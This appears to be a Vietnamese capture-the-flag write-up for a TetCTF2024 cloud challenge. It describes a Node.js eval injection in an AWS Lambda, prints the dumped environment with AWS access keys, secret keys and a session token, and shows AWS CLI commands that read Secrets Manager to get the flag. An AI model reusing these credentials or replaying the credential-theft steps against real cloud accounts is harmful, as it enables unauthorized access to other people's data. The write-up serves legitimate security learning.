🐸
endy's notes
  • 👋Welcome
  • 💁Blog linh tinh
    • HTB CPTS - review linh tinh
  • 🥷Red Teaming
    • HackTheBox Writeup
      • Web Challanges
      • Machine
    • Priv Escalation
      • 🪟Windows Priv Escalation
        • Windows User Privileges
        • Windows Built-in Groups
        • Attacking the OS
        • Credential Theft
        • Others Techniques
      • 🐧Linux Priv Escalation
    • C2
      • Sliver
    • Active Directory
      • Enumeration
      • Credentials Access
        • Kerberoasting
        • ASREPRoasting
        • DCSync
      • ACL Abuse
        • Khái niệm cơ bản
        • ACL Enumeration
        • Abuse some ACL
      • AD Trust
        • Khái niệm cơ bản
        • Enum AD Trust
        • Attack Child -> Parent Trusts
        • Attack Cross-Forest Trust
    • Lateral Movement
      • Cheatsheet
      • Lateral Movement 101
        • Impacket
        • Windows component
  • 🕸️Web Security
    • XS Leak
    • Java Sec Learn
      • Java Memory shell
        • General
        • Memshell in Tomcat
        • Deserialize to memshell in Tomcat
        • Memshell in Spring
        • Deserialize to memshell in Spring
        • Java Agent Memshell - Demo inject memshell in Jira
    • .Net Sec Learn
      • 🔀.NET Deserialize
        • Làm quen với .NET Serialization
        • Serializer - XmlSerializer và ObjectDataProvider chain
        • Formatter - một vài chain của BinaryFormatter
        • LosFormatter - ViewState deserialize
  • ⛳CTF Writeups
    • Writeup KMA CTF 2024
    • TetCTF2024
      • Hello from API GW (100)
      • Microservices (200)
      • LordGPT
      • X Ét Ét
    • SVATT Cấp học viện 2023
    • KMA CTF 2023
    • TetCTF 2023
    • DiceCTF 2023
Powered by GitBook
On this page
  1. CTF Writeups
  2. TetCTF2024

Hello from API GW (100)

PreviousTetCTF2024NextMicroservices (200)

Last updated 1 year ago

Bài này là một bài về cloud, lần đầu mình tiếp xúc với dạng này nên còn gà và chưa thể tự mình solved được

Khi truy cập web challenge cung cấp, ta được như sau

Dựa vào response thì ta biết được User Input hay chính là param vulnerable sẽ được Evaluated và trả về kết quả. Vì chall blackbox hoàn toàn, nên mình fuzz xem hành vi Evaluated như thế nào bằng Burp Intruder và phát hiện eval được thực hiện bằng nodejs code.

Mình dùng payload sau để RCE

Tuy nhiên sau gần nửa buổi mò mẫm trên server không ra được gì, nên mình đã DM tác giả để cầu cứu

Có được thông tin này mình chuyển sang tập trung exploit AWS.

Khi check env trên server thì mình được kết quả như sau

"AWS_LAMBDA_FUNCTION_VERSION":"$LATEST",
"AWS_SESSION_TOKEN":"IQoJb3JpZ2luX2VjEDcaDmFwLXNvdXRoZWFzdC0yIkYwRAIgO+7HFGEHJ/f0RSV04kjONaSlRAeYwhNDBqGiBR8SDd8CIEj8OoHhuUa/uSZXs0BpJuWt54pY+pG0pm2mFddleILrKsUDCPD//////////wEQAxoMNTQzMzAzMzkzODU5IgxIUtYnJwb6w/X5JpMqmQO0NGpp1hU/KZFXbM5mLLXIV38cElX8/Z8FXBmW0CUPYPR8smBRN8HYEs89eOSKc/vzV3HOppp+Kfk/9oWs9obtphChd5J93mqnPPQSWkKtilQzT5IFZ2aZgvvy7Bdts2j9Ni26qveBDIms28Dt3qOIibmiW8cQ0io0DRQOPBF3lWyoktuLg5VnWviXi2BRbrK8+Rh203otRUNj49BFEvXBCFlaXAe9c4Nvj2cKC1KC6hpNae5ZRG/Y5Rw187iFitnGji7XsWIFZYqh3VBxk5EuwpWP1Jd9f++Qm+KvijK7BsAx4FERaHrOM8XvW/ofycXdIin3F/YBXOrfUoVH8oVKqPdZSwKWe6Hg5tmR/wAR+OhJMrsEPvsZjp2+TLfKlD+CPh7WFycbQQ65eZdo11IYKZvjGoeKUWXZ+BH/rNE70SKiomjJyxaL2JJMGKkYWU6pyT4qyQeBEdNvAv7LIQE0mQZ5wUJGUYum297lWnfmfW8UEEVCBa780bl3w9jopuq42l4TaWY+sRTCvovzVELBLUoyLZNseB5JMIfv3q0GOp8BR5amTDndFktnwrJeAg8aUHFlAVagFFoxVmyEu90LeFo3OrxFXheSka82yYg6ET1IWk9vNd7Lhzp3MlVRxJXmo8ljsTnKBqo0WeHnW4qNyurUeF82tHtDHUcRCOp0Z8VxzVv0uKij+/ULOywoajP5OnmNnOrN9cD9Bl26NP3ukZIB5v5cNqyqthXbpBKaGO5f5TONoGjacY0jK/sFzaCy",
"AWS_LAMBDA_LOG_GROUP_NAME":"/aws/lambda/TetCtfStack-VulnerableLambdaAA73A104-aSkHuTfgUzPR",
"LD_LIBRARY_PATH":"/var/lang/lib:/lib64:/usr/lib64:/var/runtime:/var/runtime/lib:/var/task:/var/task/lib:/opt/lib",
"LAMBDA_TASK_ROOT":"/var/task",
"AWS_LAMBDA_RUNTIME_API":"127.0.0.1:9001",
"AWS_LAMBDA_LOG_STREAM_NAME":"2024/01/29/[$LATEST]30dd9468224f464e83c09e6d42403058",
"AWS_EXECUTION_ENV":"AWS_Lambda_nodejs18.x",
"AWS_XRAY_DAEMON_ADDRESS":"169.254.79.129:2000",
"AWS_LAMBDA_FUNCTION_NAME":"TetCtfStack-VulnerableLambdaAA73A104-aSkHuTfgUzPR",
"PATH":"/var/lang/bin:/usr/local/bin:/usr/bin/:/bin:/opt/bin",
"AWS_DEFAULT_REGION":"ap-southeast-2",
"PWD":"/var/task",
"AWS_SECRET_ACCESS_KEY":"AdbLHBQeAU/IJYrJ4cJ/7RzCumpS36Pq3RxhZ0eR",
"LAMBDA_RUNTIME_DIR":"/var/runtime",
"LANG":"en_US.UTF-8",
"AWS_LAMBDA_INITIALIZATION_TYPE":"on-demand",
"NODE_PATH":"/opt/nodejs/node18/node_modules:/opt/nodejs/node_modules:/var/runtime/node_modules:/var/runtime:/var/task",
"TZ":":UTC",
"AWS_REGION":"ap-southeast-2",
"ENV_ACCESS_KEY":"AKIAX473H4JB76WRTYPI",
"AWS_ACCESS_KEY_ID":"ASIAX473H4JBYHUWJR4U",
"SHLVL":"0",
"ENV_SECRET_ACCESS_KEY":"f6N48oKwKNkmS6xVJ8ZYOOj0FB/zLb/QfXCWWqyX",
"_AWS_XRAY_DAEMON_ADDRESS":"169.254.79.129",
"_AWS_XRAY_DAEMON_PORT":"2000",
"AWS_XRAY_CONTEXT_MISSING":"LOG_ERROR",
"_HANDLER":"index.handler",
"AWS_LAMBDA_FUNCTION_MEMORY_SIZE":"128",
"NODE_EXTRA_CA_CERTS":"/var/runtime/ca-cert.pem",
"_X_AMZN_TRACE_ID":"Root=1-65b7b8fe-30aba47b2289b9772f9f3866;Parent=62b9a8f75698e2f1;Sampled=0;Lineage=c3b1dc18:0"

Ở đây ta có thể dễ dàng lấy được AWS_ACCESS_KEY_ID và AWS_SECRET_ACCESS_KEY để tương tác với AWS service, tuy nhiên sau mỗi lần mình đọc env thì 2 giá trị này thay đổi liên tục, chỉ có ENV_ACCESS_KEY và ENV_SECRET_ACCESS_KEY cố định không đổi. Mình dùng 2 giá trị này để thay thế.

Khởi tạo configure với access_key và secret_key

└─$ aws configure --profile cloud1
AWS Access Key ID [None]: AKIAX473H4JB76WRTYPI
AWS Secret Access Key [None]: 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
Default region name [None]: ap-southeast-2
Default output format [None]:

Mình dùng aws-enumerator để enum thì biết được, với credentials hiện tại thì có các permission sau:

DYNAMODB DescribeEndpoints
IAM GetAccountPasswordPolicy
SECRETSMANAGER ListSecrets
STS GetSessionToken
STS GetCallerIdentity

Nhìn vào là biết nên check cái nào đầu tiên rồi. Chạy command sau để xem ListSecrets

└─$ aws secretsmanager list-secrets --profile cloud1
{
    "SecretList": [
        {
            "ARN": "arn:aws:secretsmanager:ap-southeast-2:543303393859:secret:prod/TetCTF/Flag-gnvT27",
            "Name": "prod/TetCTF/Flag",
            "LastChangedDate": 1706155046.205,
            "LastAccessedDate": 1706486400.0,
            "Tags": [],
            "SecretVersionsToStages": {
                "44e68972-c191-4bc8-acc8-d0ba3a29cea6": [
                    "AWSCURRENT"
                ]
            },
            "CreatedDate": 1706155045.933
        }
    ]
}

Dùng command sau để đọc prod và get flag

└─$ aws secretsmanager get-secret-value --secret-id prod/TetCTF/Flag --profile cloud1
{
    "ARN": "arn:aws:secretsmanager:ap-southeast-2:543303393859:secret:prod/TetCTF/Flag-gnvT27",
    "Name": "prod/TetCTF/Flag",
    "VersionId": "44e68972-c191-4bc8-acc8-d0ba3a29cea6",
    "SecretString": "{\"Flag\":\"TetCTF{B0unTy_$$$-50_for_B3ginNeR_2a3287f970cd8837b91f4f7472c5541a}\"}",
    "VersionStages": [
        "AWSCURRENT"
    ],
    "CreatedDate": 1706155046.202
}

⛳
Description